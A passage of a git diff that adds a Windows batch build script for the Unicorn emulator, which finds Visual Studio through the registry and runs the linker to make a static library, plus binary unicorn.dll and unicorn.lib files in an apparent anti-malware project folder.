ENABLEDELAYEDEXPANSION + +if not "%1"=="x86" if not "%1"=="x64" ( + echo Usage: windows_export.bat (x86 ^| x64^) + exit /b 1 +) + +:: This script invokes the Visual Studio linker to construct a static library file that can be used outside of Mingw. +:: The unicorn.def file that it references below is produced by the Mingw compiler via a linker flag. +:: The arch (x86 or x64) we are working on should be passed via the first argument to this script. + +:: Look up the Visual Studio install path via the registry +:: http://stackoverflow.com/questions/445167/how-can-i-get-the-value-of-a-registry-key-from-within-a-batch-script +:: There's no way to get the current installed VS version other than enumerating a version whitelist +:: If anyone ever tells you that Windows is a reasonable operating system, they are wrong + +echo Searching for installed visual studio version... +for %%V in ( +HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\VisualStudio\12.0 +HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\VisualStudio\14.0 +HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\VisualStudio\15.0 +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VisualStudio\12.0 +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VisualStudio\14.0 +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VisualStudio\15.0 +) do ( + echo ...trying registry key %%V + for /F "usebackq tokens=3*" %%A IN (`REG QUERY %%V /v InstallDir 2^>NUL`) DO ( + set appdir=%%A %%B + ) + if not "!appdir!"=="" goto :break +) +:break + +if "%appdir%"=="" ( + echo Could not find an installed visual studio version. Abandoning windows static lib export operation. +) else ( + :: Add the Visual Studio binaries to our path and run the linker + call "%appdir%..\..\VC\vcvarsall.bat" %1 + call lib /machine:%1 /def:unicorn.def +) + +exit /b 0 diff --git a/ai_anti_malware/unicorn/unicorn.dll b/ai_anti_malware/unicorn/unicorn.dll new file mode 100644 index 0000000..00a0001 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn.dll differ diff --git a/ai_anti_malware/unicorn/unicorn.lib b/ai_anti_malware/unicorn/unicorn.lib new file mode 100644 index 0000000..08338d6 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn.lib differ